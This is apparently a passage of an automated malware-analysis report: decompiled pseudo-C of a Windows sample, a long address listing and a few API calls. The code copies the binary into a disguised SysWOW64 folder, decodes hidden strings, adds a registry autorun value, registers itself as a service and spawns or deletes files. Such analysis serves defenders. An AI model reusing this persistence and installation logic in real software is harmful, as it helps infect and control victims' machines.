						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x25222f8;
					_a12 = _t248;
					_t250 = E0251EE95(_a12, E02512544(0x25222f8, 0x2520a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0251EE2A(_t438, 0x25222f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E025196AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112);
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0251EF00("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0251EE95(_a12, E02512544(0x25222f8, 0x2520a38, 4, 0xe4, 0xc8));
							E0251EE2A(_t438, 0x25222f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0251EE95(_a12, E02512544(_t459, 0x2520a28, 4, 0xe4, 0xc8));
								E0251EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E02516EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E025198F2(_t438);
										L19:
										ExitProcess(0);
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x25233b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E02519961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0251EF00("ghrubsm",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0251ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0251EE08(0x2522184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x2522184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0251ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0251EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0251EE08(0x25233d8,  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x2522cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0251ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0251EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E02519145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E02514280(_t438, 1);
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0251675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0251EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E02512544(_t459, 0x2520a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0251EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E025199D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0251EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E02516DC2(_t438) ^ 0x5e5e5e5e;
										__eflags = _t328;
										_push(_t328);
										E0251F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E02512544(_t459,  &E025206AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0251EE2A(_t438, _t459, 0, _t454);
										E0251EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0251EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E02512544(_t459, 0x2520a38, 4, 0xe4, 0xc8));
														E0251EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E02512544(_t459, 0x2520a28, 4, 0xe4, 0xc8));
												E0251EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E025196FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E025199D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E02516DC2(_t438) ^ 0x5e5e5e5e);
									E0251F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E02516CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0252070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0251EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E02519326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x252217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x2522180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x5e0d0108;
												 *0x2522180 = 0x5e0d0108;
												 *0x252217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E025196FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0251ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0251EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0251675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E02516A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0251ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0251EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}





















































































                                                                                                                                  0x02519a7f
                                                                                                                                  0x02519a83
                                                                                                                                  0x02519a8a
                                                                                                                                  0x02519a90
                                                                                                                                  0x02519a97
                                                                                                                                  0x02519a9d
                                                                                                                                  0x0251a3cc
                                                                                                                                  0x0251a3d2
                                                                                                                                  0x0251a41c
                                                                                                                                  0x0251a42c
                                                                                                                                  0x0251a43a
                                                                                                                                  0x0251a440
                                                                                                                                  0x0251a448
                                                                                                                                  0x0251a452
                                                                                                                                  0x0251a45a
                                                                                                                                  0x0251a469
                                                                                                                                  0x0251a46b
                                                                                                                                  0x0251a470
                                                                                                                                  0x0251a475
                                                                                                                                  0x0251a47a
                                                                                                                                  0x0251a48a
                                                                                                                                  0x0251a48c
                                                                                                                                  0x0251a497
                                                                                                                                  0x0251a497
                                                                                                                                  0x0251a49d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a49f
                                                                                                                                  0x0251a4a7
                                                                                                                                  0x0251a4ac
                                                                                                                                  0x0251a4be
                                                                                                                                  0x0251a4c3
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a4c3
                                                                                                                                  0x0251a4ae
                                                                                                                                  0x0251a4ae
                                                                                                                                  0x0251a4b3
                                                                                                                                  0x0251a4b5
                                                                                                                                  0x0251a4b9
                                                                                                                                  0x0251a4b9
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a4b5
                                                                                                                                  0x0251a497
                                                                                                                                  0x0251a3da
                                                                                                                                  0x0251a406
                                                                                                                                  0x0251a407
                                                                                                                                  0x0251a409
                                                                                                                                  0x0251a40b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a3e8
                                                                                                                                  0x0251a3eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a3ed
                                                                                                                                  0x0251a3f3
                                                                                                                                  0x0251a3f6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a3f8
                                                                                                                                  0x0251a3f8
                                                                                                                                  0x0251a3f8
                                                                                                                                  0x0251a400
                                                                                                                                  0x0251a400
                                                                                                                                  0x0251a414
                                                                                                                                  0x0251a419
                                                                                                                                  0x00000000
                                                                                                                                  0x02519aa3
                                                                                                                                  0x02519ab0
                                                                                                                                  0x02519ac2
                                                                                                                                  0x02519ac4
                                                                                                                                  0x02519ac4
                                                                                                                                  0x02519ad1
                                                                                                                                  0x02519ae1
                                                                                                                                  0x02519aef
                                                                                                                                  0x02519af4
                                                                                                                                  0x02519af9
                                                                                                                                  0x02519afb
                                                                                                                                  0x02519afb
                                                                                                                                  0x02519af9
                                                                                                                                  0x02519afd
                                                                                                                                  0x02519b14
                                                                                                                                  0x02519b1a
                                                                                                                                  0x02519b26
                                                                                                                                  0x02519b2b
                                                                                                                                  0x02519b33
                                                                                                                                  0x02519b36
                                                                                                                                  0x02519b3b
                                                                                                                                  0x02519b41
                                                                                                                                  0x02519c26
                                                                                                                                  0x02519c2b
                                                                                                                                  0x02519c2e
                                                                                                                                  0x02519c33
                                                                                                                                  0x0251a1de
                                                                                                                                  0x0251a1e4
                                                                                                                                  0x0251a1fd
                                                                                                                                  0x0251a211
                                                                                                                                  0x0251a214
                                                                                                                                  0x0251a219
                                                                                                                                  0x0251a21c
                                                                                                                                  0x0251a21f
                                                                                                                                  0x0251a2e2
                                                                                                                                  0x0251a305
                                                                                                                                  0x0251a308
                                                                                                                                  0x0251a30d
                                                                                                                                  0x0251a310
                                                                                                                                  0x0251a313
                                                                                                                                  0x0251a35a
                                                                                                                                  0x0251a35a
                                                                                                                                  0x0251a35f
                                                                                                                                  0x0251a361
                                                                                                                                  0x0251a3c2
                                                                                                                                  0x02519c05
                                                                                                                                  0x02519c06
                                                                                                                                  0x02519c06
                                                                                                                                  0x0251a363
                                                                                                                                  0x0251a369
                                                                                                                                  0x0251a397
                                                                                                                                  0x0251a397
                                                                                                                                  0x0251a39d
                                                                                                                                  0x0251a3a3
                                                                                                                                  0x0251a3aa
                                                                                                                                  0x0251a3b1
                                                                                                                                  0x0251a3b4
                                                                                                                                  0x0251a3b7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a3b7
                                                                                                                                  0x0251a36b
                                                                                                                                  0x0251a371
                                                                                                                                  0x0251a374
                                                                                                                                  0x0251a374
                                                                                                                                  0x0251a376
                                                                                                                                  0x0251a377
                                                                                                                                  0x0251a377
                                                                                                                                  0x0251a37d
                                                                                                                                  0x0251a380
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a38e
                                                                                                                                  0x0251a394
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a394
                                                                                                                                  0x0251a318
                                                                                                                                  0x0251a31e
                                                                                                                                  0x0251a324
                                                                                                                                  0x0251a325
                                                                                                                                  0x0251a327
                                                                                                                                  0x0251a339
                                                                                                                                  0x0251a33b
                                                                                                                                  0x0251a33d
                                                                                                                                  0x0251a340
                                                                                                                                  0x0251a344
                                                                                                                                  0x0251a344
                                                                                                                                  0x0251a34c
                                                                                                                                  0x0251a351
                                                                                                                                  0x0251a354
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a354
                                                                                                                                  0x0251a329
                                                                                                                                  0x0251a32b
                                                                                                                                  0x0251a32e
                                                                                                                                  0x0251a32e
                                                                                                                                  0x0251a330
                                                                                                                                  0x0251a331
                                                                                                                                  0x0251a331
                                                                                                                                  0x0251a337
                                                                                                                                  0x0251a337
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a337
                                                                                                                                  0x0251a228
                                                                                                                                  0x0251a22b
                                                                                                                                  0x0251a231
                                                                                                                                  0x0251a234
                                                                                                                                  0x0251a237
                                                                                                                                  0x0251a27a
                                                                                                                                  0x0251a280
                                                                                                                                  0x0251a281
                                                                                                                                  0x0251a283
                                                                                                                                  0x0251a28e
                                                                                                                                  0x0251a28e
                                                                                                                                  0x0251a28e
                                                                                                                                  0x0251a291
                                                                                                                                  0x0251a294
                                                                                                                                  0x0251a297
                                                                                                                                  0x0251a2a5
                                                                                                                                  0x0251a2ad
                                                                                                                                  0x0251a2b4
                                                                                                                                  0x0251a2b4
                                                                                                                                  0x0251a2b7
                                                                                                                                  0x0251a2b7
                                                                                                                                  0x0251a2bd
                                                                                                                                  0x0251a2d0
                                                                                                                                  0x0251a2d5
                                                                                                                                  0x0251a2d5
                                                                                                                                  0x0251a2d8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a2d8
                                                                                                                                  0x0251a242
                                                                                                                                  0x0251a245
                                                                                                                                  0x0251a24b
                                                                                                                                  0x0251a24c
                                                                                                                                  0x0251a24e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a253
                                                                                                                                  0x0251a264
                                                                                                                                  0x0251a26c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a26c
                                                                                                                                  0x02519c39
                                                                                                                                  0x02519c3f
                                                                                                                                  0x0251a167
                                                                                                                                  0x0251a183
                                                                                                                                  0x0251a190
                                                                                                                                  0x0251a196
                                                                                                                                  0x0251a198
                                                                                                                                  0x0251a198
                                                                                                                                  0x0251a1a2
                                                                                                                                  0x0251a1b3
                                                                                                                                  0x0251a1b6
                                                                                                                                  0x0251a1bc
                                                                                                                                  0x0251a1bf
                                                                                                                                  0x0251a1c7
                                                                                                                                  0x0251a1cc
                                                                                                                                  0x0251a1cc
                                                                                                                                  0x0251a1bf
                                                                                                                                  0x0251a1a2
                                                                                                                                  0x00000000
                                                                                                                                  0x02519c54
                                                                                                                                  0x02519c56
                                                                                                                                  0x02519c5b
                                                                                                                                  0x02519c62
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519c74
                                                                                                                                  0x02519c79
                                                                                                                                  0x02519c7c
                                                                                                                                  0x02519c81
                                                                                                                                  0x00000000
                                                                                                                                  0x02519c90
                                                                                                                                  0x02519c94
                                                                                                                                  0x02519c97
                                                                                                                                  0x02519c9a
                                                                                                                                  0x02519e3e
                                                                                                                                  0x02519e3e
                                                                                                                                  0x02519e42
                                                                                                                                  0x0251a155
                                                                                                                                  0x0251a158
                                                                                                                                  0x0251a15d
                                                                                                                                  0x0251a161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a161
                                                                                                                                  0x02519e66
                                                                                                                                  0x02519e6b
                                                                                                                                  0x02519e75
                                                                                                                                  0x02519e77
                                                                                                                                  0x0251a14a
                                                                                                                                  0x0251a14d
                                                                                                                                  0x0251a152
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a152
                                                                                                                                  0x02519e98
                                                                                                                                  0x02519e9d
                                                                                                                                  0x02519ea0
                                                                                                                                  0x02519ea2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519eab
                                                                                                                                  0x02519eb0
                                                                                                                                  0x02519ec1
                                                                                                                                  0x02519ec8
                                                                                                                                  0x02519ed5
                                                                                                                                  0x02519edb
                                                                                                                                  0x02519ee3
                                                                                                                                  0x02519ee4
                                                                                                                                  0x02519ee8
                                                                                                                                  0x02519eeb
                                                                                                                                  0x02519ef2
                                                                                                                                  0x02519ef9
                                                                                                                                  0x02519efc
                                                                                                                                  0x02519efd
                                                                                                                                  0x02519f03
                                                                                                                                  0x02519f03
                                                                                                                                  0x02519f08
                                                                                                                                  0x02519f09
                                                                                                                                  0x02519f0e
                                                                                                                                  0x02519f11
                                                                                                                                  0x02519f2d
                                                                                                                                  0x02519f32
                                                                                                                                  0x02519f3b
                                                                                                                                  0x02519f41
                                                                                                                                  0x02519f44
                                                                                                                                  0x02519f46
                                                                                                                                  0x02519f4b
                                                                                                                                  0x02519f4b
                                                                                                                                  0x02519f67
                                                                                                                                  0x02519f6a
                                                                                                                                  0x02519f6a
                                                                                                                                  0x02519f73
                                                                                                                                  0x02519f82
                                                                                                                                  0x02519f8e
                                                                                                                                  0x02519f98
                                                                                                                                  0x02519f9d
                                                                                                                                  0x02519fb4
                                                                                                                                  0x02519fba
                                                                                                                                  0x02519fbc
                                                                                                                                  0x02519fc2
                                                                                                                                  0x02519fc9
                                                                                                                                  0x02519fcf
                                                                                                                                  0x02519fd2
                                                                                                                                  0x02519fd4
                                                                                                                                  0x02519fda
                                                                                                                                  0x02519fda
                                                                                                                                  0x02519fdd
                                                                                                                                  0x02519fe1
                                                                                                                                  0x02519fe7
                                                                                                                                  0x02519feb
                                                                                                                                  0x02519ff1
                                                                                                                                  0x02519ff4
                                                                                                                                  0x02519ff8
                                                                                                                                  0x02519ffb
                                                                                                                                  0x02519ffe
                                                                                                                                  0x0251a004
                                                                                                                                  0x0251a007
                                                                                                                                  0x0251a010
                                                                                                                                  0x0251a025
                                                                                                                                  0x0251a038
                                                                                                                                  0x0251a041
                                                                                                                                  0x0251a046
                                                                                                                                  0x0251a049
                                                                                                                                  0x0251a050
                                                                                                                                  0x0251a05e
                                                                                                                                  0x0251a05e
                                                                                                                                  0x0251a072
                                                                                                                                  0x0251a078
                                                                                                                                  0x0251a07f
                                                                                                                                  0x0251a08d
                                                                                                                                  0x0251a08d
                                                                                                                                  0x0251a093
                                                                                                                                  0x0251a093
                                                                                                                                  0x0251a007
                                                                                                                                  0x02519feb
                                                                                                                                  0x02519fe1
                                                                                                                                  0x0251a09a
                                                                                                                                  0x0251a09d
                                                                                                                                  0x0251a09f
                                                                                                                                  0x0251a0a2
                                                                                                                                  0x0251a0b6
                                                                                                                                  0x0251a0de
                                                                                                                                  0x0251a0e7
                                                                                                                                  0x0251a0ec
                                                                                                                                  0x0251a0fd
                                                                                                                                  0x0251a0fd
                                                                                                                                  0x0251a0a2
                                                                                                                                  0x0251a120
                                                                                                                                  0x0251a126
                                                                                                                                  0x0251a128
                                                                                                                                  0x0251a131
                                                                                                                                  0x0251a137
                                                                                                                                  0x0251a137
                                                                                                                                  0x0251a13a
                                                                                                                                  0x0251a13e
                                                                                                                                  0x0251a140
                                                                                                                                  0x0251a143
                                                                                                                                  0x0251a145
                                                                                                                                  0x0251a145
                                                                                                                                  0x0251a143
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a13e
                                                                                                                                  0x02519ef4
                                                                                                                                  0x02519ef7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519ef7
                                                                                                                                  0x02519cac
                                                                                                                                  0x02519cb2
                                                                                                                                  0x02519cb4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519cd5
                                                                                                                                  0x02519cda
                                                                                                                                  0x02519cdf
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519ce9
                                                                                                                                  0x02519cec
                                                                                                                                  0x02519d58
                                                                                                                                  0x02519d59
                                                                                                                                  0x02519d64
                                                                                                                                  0x02519d65
                                                                                                                                  0x02519d6a
                                                                                                                                  0x02519d7a
                                                                                                                                  0x02519d8b
                                                                                                                                  0x02519d9d
                                                                                                                                  0x02519da3
                                                                                                                                  0x02519da3
                                                                                                                                  0x00000000
                                                                                                                                  0x02519cf6
                                                                                                                                  0x02519cf6
                                                                                                                                  0x02519cfc
                                                                                                                                  0x02519cff
                                                                                                                                  0x02519cff
                                                                                                                                  0x02519d01
                                                                                                                                  0x02519d02
                                                                                                                                  0x02519d06
                                                                                                                                  0x02519d0a
                                                                                                                                  0x02519d16
                                                                                                                                  0x02519d16
                                                                                                                                  0x02519d17
                                                                                                                                  0x02519d1b
                                                                                                                                  0x02519d2f
                                                                                                                                  0x02519d2f
                                                                                                                                  0x02519d3e
                                                                                                                                  0x02519d41
                                                                                                                                  0x02519d49
                                                                                                                                  0x02519d4f
                                                                                                                                  0x02519d52
                                                                                                                                  0x02519da5
                                                                                                                                  0x02519da8
                                                                                                                                  0x02519db6
                                                                                                                                  0x02519db6
                                                                                                                                  0x02519db0
                                                                                                                                  0x02519db0
                                                                                                                                  0x02519db0
                                                                                                                                  0x02519db7
                                                                                                                                  0x02519db8
                                                                                                                                  0x02519dbf
                                                                                                                                  0x02519dc3
                                                                                                                                  0x02519dca
                                                                                                                                  0x02519dd1
                                                                                                                                  0x02519dd2
                                                                                                                                  0x02519dd7
                                                                                                                                  0x02519ddc
                                                                                                                                  0x02519e21
                                                                                                                                  0x02519e26
                                                                                                                                  0x02519e29
                                                                                                                                  0x00000000
                                                                                                                                  0x02519dde
                                                                                                                                  0x02519df5
                                                                                                                                  0x02519e0c
                                                                                                                                  0x02519e11
                                                                                                                                  0x02519e16
                                                                                                                                  0x02519e1c
                                                                                                                                  0x02519e2e
                                                                                                                                  0x02519e2e
                                                                                                                                  0x02519e38
                                                                                                                                  0x00000000
                                                                                                                                  0x02519e38
                                                                                                                                  0x02519df9
                                                                                                                                  0x02519dfd
                                                                                                                                  0x02519dff
                                                                                                                                  0x02519dff
                                                                                                                                  0x02519e04
                                                                                                                                  0x00000000
                                                                                                                                  0x02519e04
                                                                                                                                  0x02519d1d
                                                                                                                                  0x02519d1d
                                                                                                                                  0x02519d23
                                                                                                                                  0x02519d2a
                                                                                                                                  0x02519d2d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519d2d
                                                                                                                                  0x00000000
                                                                                                                                  0x02519d23
                                                                                                                                  0x02519d1b
                                                                                                                                  0x02519cec
                                                                                                                                  0x02519c81
                                                                                                                                  0x02519c3f
                                                                                                                                  0x02519b47
                                                                                                                                  0x02519b4a
                                                                                                                                  0x02519b4d
                                                                                                                                  0x02519b56
                                                                                                                                  0x02519b8b
                                                                                                                                  0x02519b91
                                                                                                                                  0x02519b92
                                                                                                                                  0x02519b94
                                                                                                                                  0x02519b9f
                                                                                                                                  0x02519b9f
                                                                                                                                  0x02519b9f
                                                                                                                                  0x02519ba4
                                                                                                                                  0x02519ba4
                                                                                                                                  0x02519bb3
                                                                                                                                  0x02519bb8
                                                                                                                                  0x02519bbf
                                                                                                                                  0x02519bbf
                                                                                                                                  0x02519bc2
                                                                                                                                  0x02519bc8
                                                                                                                                  0x02519bde
                                                                                                                                  0x02519be3
                                                                                                                                  0x02519be8
                                                                                                                                  0x02519bfa
                                                                                                                                  0x02519bff
                                                                                                                                  0x02519c02
                                                                                                                                  0x02519c02
                                                                                                                                  0x02519be8
                                                                                                                                  0x00000000
                                                                                                                                  0x02519bc8
                                                                                                                                  0x02519b58
                                                                                                                                  0x02519b5e
                                                                                                                                  0x02519b64
                                                                                                                                  0x02519b67
                                                                                                                                  0x00000000
                                                                                                                                  0x02519b69
                                                                                                                                  0x02519b6b
                                                                                                                                  0x02519b7a
                                                                                                                                  0x02519b7f
                                                                                                                                  0x00000000
                                                                                                                                  0x02519b7f
                                                                                                                                  0x02519b67

                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000003), ref: 02519A7F
                                                                                                                                  • SetErrorMode.KERNEL32(00000003), ref: 02519A83
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(02516511), ref: 02519A8A
                                                                                                                                    • Part of subcall function 0251EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0251EC5E
